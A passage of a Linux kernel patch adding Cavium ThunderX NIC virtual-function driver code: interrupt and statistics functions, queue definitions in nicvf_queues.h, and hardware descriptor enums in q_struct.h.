NICVF_INTR_CQ: + reg_val |= ((1ULL << q_idx) << NICVF_INTR_CQ_SHIFT); + break; + case NICVF_INTR_SQ: + reg_val |= ((1ULL << q_idx) << NICVF_INTR_SQ_SHIFT); + break; + case NICVF_INTR_RBDR: + reg_val |= ((1ULL << q_idx) << NICVF_INTR_RBDR_SHIFT); + break; + case NICVF_INTR_PKT_DROP: + reg_val |= (1ULL << NICVF_INTR_PKT_DROP_SHIFT); + break; + case NICVF_INTR_TCP_TIMER: + reg_val |= (1ULL << NICVF_INTR_TCP_TIMER_SHIFT); + break; + case NICVF_INTR_MBOX: + reg_val |= (1ULL << NICVF_INTR_MBOX_SHIFT); + break; + case NICVF_INTR_QS_ERR: + reg_val |= (1ULL << NICVF_INTR_QS_ERR_SHIFT); + break; + default: + netdev_err(nic->netdev, + "Failed to disable interrupt: unknown type\n"); + break; + } + + nicvf_reg_write(nic, NIC_VF_ENA_W1C, reg_val); +} + +/* Clear interrupt */ +void nicvf_clear_intr(struct nicvf *nic, int int_type, int q_idx) +{ + u64 reg_val = 0; + + switch (int_type) { + case NICVF_INTR_CQ: + reg_val = ((1ULL << q_idx) << NICVF_INTR_CQ_SHIFT); + break; + case NICVF_INTR_SQ: + reg_val = ((1ULL << q_idx) << NICVF_INTR_SQ_SHIFT); + break; + case NICVF_INTR_RBDR: + reg_val = ((1ULL << q_idx) << NICVF_INTR_RBDR_SHIFT); + break; + case NICVF_INTR_PKT_DROP: + reg_val = (1ULL << NICVF_INTR_PKT_DROP_SHIFT); + break; + case NICVF_INTR_TCP_TIMER: + reg_val = (1ULL << NICVF_INTR_TCP_TIMER_SHIFT); + break; + case NICVF_INTR_MBOX: + reg_val = (1ULL << NICVF_INTR_MBOX_SHIFT); + break; + case NICVF_INTR_QS_ERR: + reg_val |= (1ULL << NICVF_INTR_QS_ERR_SHIFT); + break; + default: + netdev_err(nic->netdev, + "Failed to clear interrupt: unknown type\n"); + break; + } + + nicvf_reg_write(nic, NIC_VF_INT, reg_val); +} + +/* Check if interrupt is enabled */ +int nicvf_is_intr_enabled(struct nicvf *nic, int int_type, int q_idx) +{ + u64 reg_val; + u64 mask = 0xff; + + reg_val = nicvf_reg_read(nic, NIC_VF_ENA_W1S); + + switch (int_type) { + case NICVF_INTR_CQ: + mask = ((1ULL << q_idx) << NICVF_INTR_CQ_SHIFT); + break; + case NICVF_INTR_SQ: + mask = ((1ULL << q_idx) << NICVF_INTR_SQ_SHIFT); + break; + case NICVF_INTR_RBDR: + mask = ((1ULL << q_idx) << NICVF_INTR_RBDR_SHIFT); + break; + case NICVF_INTR_PKT_DROP: + mask = NICVF_INTR_PKT_DROP_MASK; + break; + case NICVF_INTR_TCP_TIMER: + mask = NICVF_INTR_TCP_TIMER_MASK; + break; + case NICVF_INTR_MBOX: + mask = NICVF_INTR_MBOX_MASK; + break; + case NICVF_INTR_QS_ERR: + mask = NICVF_INTR_QS_ERR_MASK; + break; + default: + netdev_err(nic->netdev, + "Failed to check interrupt enable: unknown type\n"); + break; + } + + return (reg_val & mask); +} + +void nicvf_update_rq_stats(struct nicvf *nic, int rq_idx) +{ + struct rcv_queue *rq; + +#define GET_RQ_STATS(reg) \ + nicvf_reg_read(nic, NIC_QSET_RQ_0_7_STAT_0_1 |\ + (rq_idx << NIC_Q_NUM_SHIFT) | (reg << 3)) + + rq = &nic->qs->rq[rq_idx]; + rq->stats.bytes = GET_RQ_STATS(RQ_SQ_STATS_OCTS); + rq->stats.pkts = GET_RQ_STATS(RQ_SQ_STATS_PKTS); +} + +void nicvf_update_sq_stats(struct nicvf *nic, int sq_idx) +{ + struct snd_queue *sq; + +#define GET_SQ_STATS(reg) \ + nicvf_reg_read(nic, NIC_QSET_SQ_0_7_STAT_0_1 |\ + (sq_idx << NIC_Q_NUM_SHIFT) | (reg << 3)) + + sq = &nic->qs->sq[sq_idx]; + sq->stats.bytes = GET_SQ_STATS(RQ_SQ_STATS_OCTS); + sq->stats.pkts = GET_SQ_STATS(RQ_SQ_STATS_PKTS); +} + +/* Check for errors in the receive cmp.queue entry */ +int nicvf_check_cqe_rx_errs(struct nicvf *nic, + struct cmp_queue *cq, struct cqe_rx_t *cqe_rx) +{ + struct cmp_queue_stats *stats = &cq->stats; + + if (!cqe_rx->err_level && !cqe_rx->err_opcode) { + stats->rx.errop.good++; + return 0; + } + + if (netif_msg_rx_err(nic)) + netdev_err(nic->netdev, + "%s: RX error CQE err_level 0x%x err_opcode 0x%x\n", + nic->netdev->name, + cqe_rx->err_level, cqe_rx->err_opcode); + + switch (cqe_rx->err_level) { + case CQ_ERRLVL_MAC: + stats->rx.errlvl.mac_errs++; + break; + case CQ_ERRLVL_L2: + stats->rx.errlvl.l2_errs++; + break; + case CQ_ERRLVL_L3: + stats->rx.errlvl.l3_errs++; + break; + case CQ_ERRLVL_L4: + stats->rx.errlvl.l4_errs++; + break; + } + + switch (cqe_rx->err_opcode) { + case CQ_RX_ERROP_RE_PARTIAL: + stats->rx.errop.partial_pkts++; + break; + case CQ_RX_ERROP_RE_JABBER: + stats->rx.errop.jabber_errs++; + break; + case CQ_RX_ERROP_RE_FCS: + stats->rx.errop.fcs_errs++; + break; + case CQ_RX_ERROP_RE_TERMINATE: + stats->rx.errop.terminate_errs++; + break; + case CQ_RX_ERROP_RE_RX_CTL: + stats->rx.errop.bgx_rx_errs++; + break; + case CQ_RX_ERROP_PREL2_ERR: + stats->rx.errop.prel2_errs++; + break; + case CQ_RX_ERROP_L2_FRAGMENT: + stats->rx.errop.l2_frags++; + break; + case CQ_RX_ERROP_L2_OVERRUN: + stats->rx.errop.l2_overruns++; + break; + case CQ_RX_ERROP_L2_PFCS: + stats->rx.errop.l2_pfcs++; + break; + case CQ_RX_ERROP_L2_PUNY: + stats->rx.errop.l2_puny++; + break; + case CQ_RX_ERROP_L2_MAL: + stats->rx.errop.l2_hdr_malformed++; + break; + case CQ_RX_ERROP_L2_OVERSIZE: + stats->rx.errop.l2_oversize++; + break; + case CQ_RX_ERROP_L2_UNDERSIZE: + stats->rx.errop.l2_undersize++; + break; + case CQ_RX_ERROP_L2_LENMISM: + stats->rx.errop.l2_len_mismatch++; + break; + case CQ_RX_ERROP_L2_PCLP: + stats->rx.errop.l2_pclp++; + break; + case CQ_RX_ERROP_IP_NOT: + stats->rx.errop.non_ip++; + break; + case CQ_RX_ERROP_IP_CSUM_ERR: + stats->rx.errop.ip_csum_err++; + break; + case CQ_RX_ERROP_IP_MAL: + stats->rx.errop.ip_hdr_malformed++; + break; + case CQ_RX_ERROP_IP_MALD: + stats->rx.errop.ip_payload_malformed++; + break; + case CQ_RX_ERROP_IP_HOP: + stats->rx.errop.ip_hop_errs++; + break; + case CQ_RX_ERROP_L3_ICRC: + stats->rx.errop.l3_icrc_errs++; + break; + case CQ_RX_ERROP_L3_PCLP: + stats->rx.errop.l3_pclp++; + break; + case CQ_RX_ERROP_L4_MAL: + stats->rx.errop.l4_malformed++; + break; + case CQ_RX_ERROP_L4_CHK: + stats->rx.errop.l4_csum_errs++; + break; + case CQ_RX_ERROP_UDP_LEN: + stats->rx.errop.udp_len_err++; + break; + case CQ_RX_ERROP_L4_PORT: + stats->rx.errop.bad_l4_port++; + break; + case CQ_RX_ERROP_TCP_FLAG: + stats->rx.errop.bad_tcp_flag++; + break; + case CQ_RX_ERROP_TCP_OFFSET: + stats->rx.errop.tcp_offset_errs++; + break; + case CQ_RX_ERROP_L4_PCLP: + stats->rx.errop.l4_pclp++; + break; + case CQ_RX_ERROP_RBDR_TRUNC: + stats->rx.errop.pkt_truncated++; + break; + } + + return 1; +} + +/* Check for errors in the send cmp.queue entry */ +int nicvf_check_cqe_tx_errs(struct nicvf *nic, + struct cmp_queue *cq, struct cqe_send_t *cqe_tx) +{ + struct cmp_queue_stats *stats = &cq->stats; + + switch (cqe_tx->send_status) { + case CQ_TX_ERROP_GOOD: + stats->tx.good++; + return 0; + case CQ_TX_ERROP_DESC_FAULT: + stats->tx.desc_fault++; + break; + case CQ_TX_ERROP_HDR_CONS_ERR: + stats->tx.hdr_cons_err++; + break; + case CQ_TX_ERROP_SUBDC_ERR: + stats->tx.subdesc_err++; + break; + case CQ_TX_ERROP_IMM_SIZE_OFLOW: + stats->tx.imm_size_oflow++; + break; + case CQ_TX_ERROP_DATA_SEQUENCE_ERR: + stats->tx.data_seq_err++; + break; + case CQ_TX_ERROP_MEM_SEQUENCE_ERR: + stats->tx.mem_seq_err++; + break; + case CQ_TX_ERROP_LOCK_VIOL: + stats->tx.lock_viol++; + break; + case CQ_TX_ERROP_DATA_FAULT: + stats->tx.data_fault++; + break; + case CQ_TX_ERROP_TSTMP_CONFLICT: + stats->tx.tstmp_conflict++; + break; + case CQ_TX_ERROP_TSTMP_TIMEOUT: + stats->tx.tstmp_timeout++; + break; + case CQ_TX_ERROP_MEM_FAULT: + stats->tx.mem_fault++; + break; + case CQ_TX_ERROP_CK_OVERLAP: + stats->tx.csum_overlap++; + break; + case CQ_TX_ERROP_CK_OFLOW: + stats->tx.csum_overflow++; + break; + } + + return 1; +} diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_queues.h b/drivers/net/ethernet/cavium/thunder/nicvf_queues.h new file mode 100644 index 000000000000..8341bdf755d1 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nicvf_queues.h @@ -0,0 +1,381 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#ifndef NICVF_QUEUES_H +#define NICVF_QUEUES_H + +#include +#include "q_struct.h" + +#define MAX_QUEUE_SET 128 +#define MAX_RCV_QUEUES_PER_QS 8 +#define MAX_RCV_BUF_DESC_RINGS_PER_QS 2 +#define MAX_SND_QUEUES_PER_QS 8 +#define MAX_CMP_QUEUES_PER_QS 8 + +/* VF's queue interrupt ranges */ +#define NICVF_INTR_ID_CQ 0 +#define NICVF_INTR_ID_SQ 8 +#define NICVF_INTR_ID_RBDR 16 +#define NICVF_INTR_ID_MISC 18 +#define NICVF_INTR_ID_QS_ERR 19 + +#define for_each_cq_irq(irq) \ + for (irq = NICVF_INTR_ID_CQ; irq < NICVF_INTR_ID_SQ; irq++) +#define for_each_sq_irq(irq) \ + for (irq = NICVF_INTR_ID_SQ; irq < NICVF_INTR_ID_RBDR; irq++) +#define for_each_rbdr_irq(irq) \ + for (irq = NICVF_INTR_ID_RBDR; irq < NICVF_INTR_ID_MISC; irq++) + +#define RBDR_SIZE0 0ULL /* 8K entries */ +#define RBDR_SIZE1 1ULL /* 16K entries */ +#define RBDR_SIZE2 2ULL /* 32K entries */ +#define RBDR_SIZE3 3ULL /* 64K entries */ +#define RBDR_SIZE4 4ULL /* 126K entries */ +#define RBDR_SIZE5 5ULL /* 256K entries */ +#define RBDR_SIZE6 6ULL /* 512K entries */ + +#define SND_QUEUE_SIZE0 0ULL /* 1K entries */ +#define SND_QUEUE_SIZE1 1ULL /* 2K entries */ +#define SND_QUEUE_SIZE2 2ULL /* 4K entries */ +#define SND_QUEUE_SIZE3 3ULL /* 8K entries */ +#define SND_QUEUE_SIZE4 4ULL /* 16K entries */ +#define SND_QUEUE_SIZE5 5ULL /* 32K entries */ +#define SND_QUEUE_SIZE6 6ULL /* 64K entries */ + +#define CMP_QUEUE_SIZE0 0ULL /* 1K entries */ +#define CMP_QUEUE_SIZE1 1ULL /* 2K entries */ +#define CMP_QUEUE_SIZE2 2ULL /* 4K entries */ +#define CMP_QUEUE_SIZE3 3ULL /* 8K entries */ +#define CMP_QUEUE_SIZE4 4ULL /* 16K entries */ +#define CMP_QUEUE_SIZE5 5ULL /* 32K entries */ +#define CMP_QUEUE_SIZE6 6ULL /* 64K entries */ + +/* Default queue count per QS, its lengths and threshold values */ +#define RBDR_CNT 1 +#define RCV_QUEUE_CNT 8 +#define SND_QUEUE_CNT 8 +#define CMP_QUEUE_CNT 8 /* Max of RCV and SND qcount */ + +#define SND_QSIZE SND_QUEUE_SIZE4 +#define SND_QUEUE_LEN (1ULL << (SND_QSIZE + 10)) +#define MAX_SND_QUEUE_LEN (1ULL << (SND_QUEUE_SIZE6 + 10)) +#define SND_QUEUE_THRESH 2ULL +#define MIN_SQ_DESC_PER_PKT_XMIT 2 +/* Since timestamp not enabled, otherwise 2 */ +#define MAX_CQE_PER_PKT_XMIT 1 + +#define CMP_QSIZE CMP_QUEUE_SIZE4 +#define CMP_QUEUE_LEN (1ULL << (CMP_QSIZE + 10)) +#define CMP_QUEUE_CQE_THRESH 0 +#define CMP_QUEUE_TIMER_THRESH 220 /* 10usec */ + +#define RBDR_SIZE RBDR_SIZE0 +#define RCV_BUF_COUNT (1ULL << (RBDR_SIZE + 13)) +#define MAX_RCV_BUF_COUNT (1ULL << (RBDR_SIZE6 + 13)) +#define RBDR_THRESH (RCV_BUF_COUNT / 2) +#define DMA_BUFFER_LEN 2048 /* In multiples of 128bytes */ +#define RCV_FRAG_LEN (SKB_DATA_ALIGN(DMA_BUFFER_LEN + NET_SKB_PAD) + \ + SKB_DATA_ALIGN(sizeof(struct skb_shared_info)) + \ + (NICVF_RCV_BUF_ALIGN_BYTES * 2)) +#define RCV_DATA_OFFSET NICVF_RCV_BUF_ALIGN_BYTES + +#define MAX_CQES_FOR_TX ((SND_QUEUE_LEN / MIN_SQ_DESC_PER_PKT_XMIT) * \ + MAX_CQE_PER_PKT_XMIT) +#define RQ_CQ_DROP ((CMP_QUEUE_LEN - MAX_CQES_FOR_TX) / 256) + +/* Descriptor size in bytes */ +#define SND_QUEUE_DESC_SIZE 16 +#define CMP_QUEUE_DESC_SIZE 512 + +/* Buffer / descriptor alignments */ +#define NICVF_RCV_BUF_ALIGN 7 +#define NICVF_RCV_BUF_ALIGN_BYTES (1ULL << NICVF_RCV_BUF_ALIGN) +#define NICVF_CQ_BASE_ALIGN_BYTES 512 /* 9 bits */ +#define NICVF_SQ_BASE_ALIGN_BYTES 128 /* 7 bits */ + +#define NICVF_ALIGNED_ADDR(ADDR, ALIGN_BYTES) ALIGN(ADDR, ALIGN_BYTES) +#define NICVF_ADDR_ALIGN_LEN(ADDR, BYTES)\ + (NICVF_ALIGNED_ADDR(ADDR, BYTES) - BYTES) +#define NICVF_RCV_BUF_ALIGN_LEN(X)\ + (NICVF_ALIGNED_ADDR(X, NICVF_RCV_BUF_ALIGN_BYTES) - X) + +/* Queue enable/disable */ +#define NICVF_SQ_EN BIT_ULL(19) + +/* Queue reset */ +#define NICVF_CQ_RESET BIT_ULL(41) +#define NICVF_SQ_RESET BIT_ULL(17) +#define NICVF_RBDR_RESET BIT_ULL(43) + +enum CQ_RX_ERRLVL_E { + CQ_ERRLVL_MAC, + CQ_ERRLVL_L2, + CQ_ERRLVL_L3, + CQ_ERRLVL_L4, +}; + +enum CQ_RX_ERROP_E { + CQ_RX_ERROP_RE_NONE = 0x0, + CQ_RX_ERROP_RE_PARTIAL = 0x1, + CQ_RX_ERROP_RE_JABBER = 0x2, + CQ_RX_ERROP_RE_FCS = 0x7, + CQ_RX_ERROP_RE_TERMINATE = 0x9, + CQ_RX_ERROP_RE_RX_CTL = 0xb, + CQ_RX_ERROP_PREL2_ERR = 0x1f, + CQ_RX_ERROP_L2_FRAGMENT = 0x20, + CQ_RX_ERROP_L2_OVERRUN = 0x21, + CQ_RX_ERROP_L2_PFCS = 0x22, + CQ_RX_ERROP_L2_PUNY = 0x23, + CQ_RX_ERROP_L2_MAL = 0x24, + CQ_RX_ERROP_L2_OVERSIZE = 0x25, + CQ_RX_ERROP_L2_UNDERSIZE = 0x26, + CQ_RX_ERROP_L2_LENMISM = 0x27, + CQ_RX_ERROP_L2_PCLP = 0x28, + CQ_RX_ERROP_IP_NOT = 0x41, + CQ_RX_ERROP_IP_CSUM_ERR = 0x42, + CQ_RX_ERROP_IP_MAL = 0x43, + CQ_RX_ERROP_IP_MALD = 0x44, + CQ_RX_ERROP_IP_HOP = 0x45, + CQ_RX_ERROP_L3_ICRC = 0x46, + CQ_RX_ERROP_L3_PCLP = 0x47, + CQ_RX_ERROP_L4_MAL = 0x61, + CQ_RX_ERROP_L4_CHK = 0x62, + CQ_RX_ERROP_UDP_LEN = 0x63, + CQ_RX_ERROP_L4_PORT = 0x64, + CQ_RX_ERROP_TCP_FLAG = 0x65, + CQ_RX_ERROP_TCP_OFFSET = 0x66, + CQ_RX_ERROP_L4_PCLP = 0x67, + CQ_RX_ERROP_RBDR_TRUNC = 0x70, +}; + +enum CQ_TX_ERROP_E { + CQ_TX_ERROP_GOOD = 0x0, + CQ_TX_ERROP_DESC_FAULT = 0x10, + CQ_TX_ERROP_HDR_CONS_ERR = 0x11, + CQ_TX_ERROP_SUBDC_ERR = 0x12, + CQ_TX_ERROP_IMM_SIZE_OFLOW = 0x80, + CQ_TX_ERROP_DATA_SEQUENCE_ERR = 0x81, + CQ_TX_ERROP_MEM_SEQUENCE_ERR = 0x82, + CQ_TX_ERROP_LOCK_VIOL = 0x83, + CQ_TX_ERROP_DATA_FAULT = 0x84, + CQ_TX_ERROP_TSTMP_CONFLICT = 0x85, + CQ_TX_ERROP_TSTMP_TIMEOUT = 0x86, + CQ_TX_ERROP_MEM_FAULT = 0x87, + CQ_TX_ERROP_CK_OVERLAP = 0x88, + CQ_TX_ERROP_CK_OFLOW = 0x89, + CQ_TX_ERROP_ENUM_LAST = 0x8a, +}; + +struct cmp_queue_stats { + struct rx_stats { + struct { + u64 mac_errs; + u64 l2_errs; + u64 l3_errs; + u64 l4_errs; + } errlvl; + struct { + u64 good; + u64 partial_pkts; + u64 jabber_errs; + u64 fcs_errs; + u64 terminate_errs; + u64 bgx_rx_errs; + u64 prel2_errs; + u64 l2_frags; + u64 l2_overruns; + u64 l2_pfcs; + u64 l2_puny; + u64 l2_hdr_malformed; + u64 l2_oversize; + u64 l2_undersize; + u64 l2_len_mismatch; + u64 l2_pclp; + u64 non_ip; + u64 ip_csum_err; + u64 ip_hdr_malformed; + u64 ip_payload_malformed; + u64 ip_hop_errs; + u64 l3_icrc_errs; + u64 l3_pclp; + u64 l4_malformed; + u64 l4_csum_errs; + u64 udp_len_err; + u64 bad_l4_port; + u64 bad_tcp_flag; + u64 tcp_offset_errs; + u64 l4_pclp; + u64 pkt_truncated; + } errop; + } rx; + struct tx_stats { + u64 good; + u64 desc_fault; + u64 hdr_cons_err; + u64 subdesc_err; + u64 imm_size_oflow; + u64 data_seq_err; + u64 mem_seq_err; + u64 lock_viol; + u64 data_fault; + u64 tstmp_conflict; + u64 tstmp_timeout; + u64 mem_fault; + u64 csum_overlap; + u64 csum_overflow; + } tx; +} ____cacheline_aligned_in_smp; + +enum RQ_SQ_STATS { + RQ_SQ_STATS_OCTS, + RQ_SQ_STATS_PKTS, +}; + +struct rx_tx_queue_stats { + u64 bytes; + u64 pkts; +} ____cacheline_aligned_in_smp; + +struct q_desc_mem { + dma_addr_t dma; + u64 size; + u16 q_len; + dma_addr_t phys_base; + void *base; + void *unalign_base; +}; + +struct rbdr { + bool enable; + u32 dma_size; + u32 frag_len; + u32 thresh; /* Threshold level for interrupt */ + void *desc; + u32 head; + u32 tail; + struct q_desc_mem dmem; +} ____cacheline_aligned_in_smp; + +struct rcv_queue { + bool enable; + struct rbdr *rbdr_start; + struct rbdr *rbdr_cont; + bool en_tcp_reassembly; + u8 cq_qs; /* CQ's QS to which this RQ is assigned */ + u8 cq_idx; /* CQ index (0 to 7) in the QS */ + u8 cont_rbdr_qs; /* Continue buffer ptrs - QS num */ + u8 cont_qs_rbdr_idx; /* RBDR idx in the cont QS */ + u8 start_rbdr_qs; /* First buffer ptrs - QS num */ + u8 start_qs_rbdr_idx; /* RBDR idx in the above QS */ + u8 caching; + struct rx_tx_queue_stats stats; +} ____cacheline_aligned_in_smp; + +struct cmp_queue { + bool enable; + u16 thresh; + spinlock_t lock; /* lock to serialize processing CQEs */ + void *desc; + struct q_desc_mem dmem; + struct cmp_queue_stats stats; +} ____cacheline_aligned_in_smp; + +struct snd_queue { + bool enable; + u8 cq_qs; /* CQ's QS to which this SQ is pointing */ + u8 cq_idx; /* CQ index (0 to 7) in the above QS */ + u16 thresh; + atomic_t free_cnt; + u32 head; + u32 tail; + u64 *skbuff; + void *desc; + +#define TSO_HEADER_SIZE 128 + /* For TSO segment's header */ + char *tso_hdrs; + dma_addr_t tso_hdrs_phys; + + cpumask_t affinity_mask; + struct q_desc_mem dmem; + struct rx_tx_queue_stats stats; +} ____cacheline_aligned_in_smp; + +struct queue_set { + bool enable; + bool be_en; + u8 vnic_id; + u8 rq_cnt; + u8 cq_cnt; + u64 cq_len; + u8 sq_cnt; + u64 sq_len; + u8 rbdr_cnt; + u64 rbdr_len; + struct rcv_queue rq[MAX_RCV_QUEUES_PER_QS]; + struct cmp_queue cq[MAX_CMP_QUEUES_PER_QS]; + struct snd_queue sq[MAX_SND_QUEUES_PER_QS]; + struct rbdr rbdr[MAX_RCV_BUF_DESC_RINGS_PER_QS]; +} ____cacheline_aligned_in_smp; + +#define GET_RBDR_DESC(RING, idx)\ + (&(((struct rbdr_entry_t *)((RING)->desc))[idx])) +#define GET_SQ_DESC(RING, idx)\ + (&(((struct sq_hdr_subdesc *)((RING)->desc))[idx])) +#define GET_CQ_DESC(RING, idx)\ + (&(((union cq_desc_t *)((RING)->desc))[idx])) + +/* CQ status bits */ +#define CQ_WR_FULL BIT(26) +#define CQ_WR_DISABLE BIT(25) +#define CQ_WR_FAULT BIT(24) +#define CQ_CQE_COUNT (0xFFFF << 0) + +#define CQ_ERR_MASK (CQ_WR_FULL | CQ_WR_DISABLE | CQ_WR_FAULT) + +int nicvf_set_qset_resources(struct nicvf *nic); +int nicvf_config_data_transfer(struct nicvf *nic, bool enable); +void nicvf_qset_config(struct nicvf *nic, bool enable); +void nicvf_cmp_queue_config(struct nicvf *nic, struct queue_set *qs, + int qidx, bool enable); + +void nicvf_sq_enable(struct nicvf *nic, struct snd_queue *sq, int qidx); +void nicvf_sq_disable(struct nicvf *nic, int qidx); +void nicvf_put_sq_desc(struct snd_queue *sq, int desc_cnt); +void nicvf_sq_free_used_descs(struct net_device *netdev, + struct snd_queue *sq, int qidx); +int nicvf_sq_append_skb(struct nicvf *nic, struct sk_buff *skb); + +struct sk_buff *nicvf_get_rcv_skb(struct nicvf *nic, struct cqe_rx_t *cqe_rx); +void nicvf_rbdr_task(unsigned long data); +void nicvf_rbdr_work(struct work_struct *work); + +void nicvf_enable_intr(struct nicvf *nic, int int_type, int q_idx); +void nicvf_disable_intr(struct nicvf *nic, int int_type, int q_idx); +void nicvf_clear_intr(struct nicvf *nic, int int_type, int q_idx); +int nicvf_is_intr_enabled(struct nicvf *nic, int int_type, int q_idx); + +/* Register access APIs */ +void nicvf_reg_write(struct nicvf *nic, u64 offset, u64 val); +u64 nicvf_reg_read(struct nicvf *nic, u64 offset); +void nicvf_qset_reg_write(struct nicvf *nic, u64 offset, u64 val); +u64 nicvf_qset_reg_read(struct nicvf *nic, u64 offset); +void nicvf_queue_reg_write(struct nicvf *nic, u64 offset, + u64 qidx, u64 val); +u64 nicvf_queue_reg_read(struct nicvf *nic, + u64 offset, u64 qidx); + +/* Stats */ +void nicvf_update_rq_stats(struct nicvf *nic, int rq_idx); +void nicvf_update_sq_stats(struct nicvf *nic, int sq_idx); +int nicvf_check_cqe_rx_errs(struct nicvf *nic, + struct cmp_queue *cq, struct cqe_rx_t *cqe_rx); +int nicvf_check_cqe_tx_errs(struct nicvf *nic, + struct cmp_queue *cq, struct cqe_send_t *cqe_tx); +#endif /* NICVF_QUEUES_H */ diff --git a/drivers/net/ethernet/cavium/thunder/q_struct.h b/drivers/net/ethernet/cavium/thunder/q_struct.h new file mode 100644 index 000000000000..3c1de97b1add --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/q_struct.h @@ -0,0 +1,701 @@ +/* + * This file contains HW queue descriptor formats, config register + * structures etc + * + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#ifndef Q_STRUCT_H +#define Q_STRUCT_H + +/* Load transaction types for reading segment bytes specified by + * NIC_SEND_GATHER_S[LD_TYPE]. + */ +enum nic_send_ld_type_e { + NIC_SEND_LD_TYPE_E_LDD = 0x0, + NIC_SEND_LD_TYPE_E_LDT = 0x1, + NIC_SEND_LD_TYPE_E_LDWB = 0x2, + NIC_SEND_LD_TYPE_E_ENUM_LAST = 0x3, +}; + +enum ether_type_algorithm { + ETYPE_ALG_NONE = 0x0, + ETYPE_ALG_SKIP = 0x1, + ETYPE_ALG_ENDPARSE = 0x2, + ETYPE_ALG_VLAN = 0x3, + ETYPE_ALG_VLAN_STRIP = 0x4, +}; + +enum layer3_type { + L3TYPE_NONE = 0x00, + L3TYPE_GRH = 0x01, + L3TYPE_IPV4 = 0x04, + L3TYPE_IPV4_OPTIONS = 0x05, + L3TYPE_IPV6 = 0x06, + L3TYPE_IPV6_OPTIONS = 0x07, + L3TYPE_ET_STOP = 0x0D, + L3TYPE_OTHER = 0x0E, +}; + +enum layer4_type { + L4TYPE_NONE = 0x00, + L4TYPE_IPSEC_ESP = 0x01, + L4TYPE_IPFRAG = 0x02, + L4TYPE_IPCOMP = 0x03, + L4TYPE_TCP = 0x04, + L4TYPE_UDP = 0x05, + L4TYPE_SCTP = 0x06, + L4TYPE_GRE = 0x07, + L4TYPE_ROCE_BTH = 0x08, + L4TYPE_OTHER = 0x0E, +}; + +/* CPI and RSSI configuration */ +enum cpi_algorithm_type { + CPI_ALG_NONE = 0x0, + CPI_ALG_VLAN = 0x1, + CPI_ALG_VLAN16 = 0x2, + CPI_ALG_DIFF = 0x3, +}; + +enum rss_algorithm_type { + RSS_ALG_NONE = 0x00, + RSS_ALG_PORT = 0x01, + RSS_ALG_IP = 0x02, + RSS_ALG_TCP_IP = 0x03, + RSS_ALG_UDP_IP = 0x04, + RSS_ALG_SCTP_IP = 0x05, + RSS_ALG_GRE_IP = 0x06, + RSS_ALG_ROCE = 0x07, +}; + +enum rss_hash_cfg { + RSS_HASH_L2ETC = 0x00, + RSS_HASH_IP = 0x01, + RSS_HASH_TCP = 0x02, + RSS_HASH_TCP_SYN_DIS = 0x03, + RSS_HASH_UDP = 0x04, + RSS_HASH_L4ETC = 0x05, + RSS_HASH_ROCE = 0x06, + RSS_L3_BIDI = 0x07, + RSS_L4_BIDI = 0x08, +}; + +/* Completion queue entry types */ +enum cqe_type { + CQE_TYPE_INVALID = 0x0, + CQE_TYPE_RX = 0x2, + CQE_TYPE_RX_SPLIT = 0x3, + CQE_TYPE_RX_TCP = 0x4, + CQE_TYPE_SEND = 0x8, + CQE_TYPE_SEND_PTP = 0x9, +}; + +enum cqe_rx_tcp_status { + CQE_RX_STATUS_VALID_TCP_CNXT = 0x00, + CQE_RX_STATUS_INVALID_TCP_CNXT = 0x0F, +}; + +enum cqe_send_status { + CQE_SEND_STATUS_GOOD = 0x00, + CQE_SEND_STATUS_DESC_FAULT = 0x01, + CQE_SEND_STATUS_HDR_CONS_ERR = 0x11, + CQE_SEND_STATUS_SUBDESC_ERR = 0x12, + CQE_SEND_STATUS_IMM_SIZE_OFLOW = 0x80, + CQE_SEND_STATUS_CRC_SEQ_ERR = 0x81, + CQE_SEND_STATUS_DATA_SEQ_ERR = 0x82, + CQE_SEND_STATUS_MEM_SEQ_ERR = 0x83, + CQE_SEND_STATUS_LOCK_VIOL = 0x84, + CQE_SEND_STATUS_LOCK_UFLOW = 0x85, + CQE_SEND_STATUS_DATA_FAULT = 0x86, + CQE_SEND_STATUS_TSTMP_CONFLICT = 0x87, + CQE_SEND_STATUS_TSTMP_TIMEOUT = 0x88, + CQE_SEND_STATUS_MEM_FAULT = 0x89, + CQE_SEND_STATUS_CSUM_OVERLAP = 0x8A, + CQE_SEND_STATUS_CSUM_OVERFLOW = 0x8B, +}; + +enum cqe_rx_tcp_end_reason { + CQE_RX_TCP_END_FIN_FLAG_DET = 0, + CQE_RX_TCP_END_INVALID_FLAG = 1, + CQE_RX_TCP_END_TIMEOUT = 2, + CQE_RX_TCP_END_OUT_OF_SEQ = 3, + CQE_RX_TCP_END_PKT_ERR = 4, + CQE_RX_TCP_END_QS_DISABLED = 0x0F, +}; + +/* Packet protocol level error enumeration */ +enum cqe_rx_err_level { + CQE_RX_ERRLVL_RE = 0x0, + CQE_RX_ERRLVL_L2 = 0x1, + CQE_RX_ERRLVL_L3 = 0x2, + CQE_RX_ERRLVL_L4 = 0x3, +}; + +/* Packet protocol level error type enumeration */ +enum cqe_rx_err_opcode { + CQE_RX_ERR_RE_NONE = 0x0, + CQE_RX_ERR_RE_PARTIAL = 0x1, + CQE_RX_ERR_RE_JABBER = 0x2, + CQE_RX_ERR_RE_FCS = 0x7, + CQE_RX_ERR_RE_TERMINATE = 0x9, + CQE_RX_ERR_RE_RX_CTL = 0xb, + CQE_RX_ERR_PREL2_ERR = 0x1f, + CQE_RX_ERR_L2_FRAGMENT = 0x20, + CQE_RX_ERR_L2_OVERRUN = 0x21, + CQE_RX_ERR_L2_PFCS = 0x22, + CQE_RX_ERR_L2_PUNY = 0x23, + CQE_RX_ERR_L2_MAL = 0x24, + CQE_RX_ERR_L2_OVERSIZE = 0x25, + CQE_RX_ERR_L2_UNDERSIZE = 0x26, + CQE_RX_ERR_L2_LENMISM = 0x27, + CQE_RX_ERR_L2_PCLP = 0x28, + CQE_RX_ERR_IP_NOT = 0x41, + CQE_RX_ERR_IP_CHK = 0x42, + CQE_RX_ERR_IP_MAL = 0x43, + CQE_RX_ERR_IP_MALD = 0x44, + CQE_RX_ERR_IP_HOP = 0x45, + 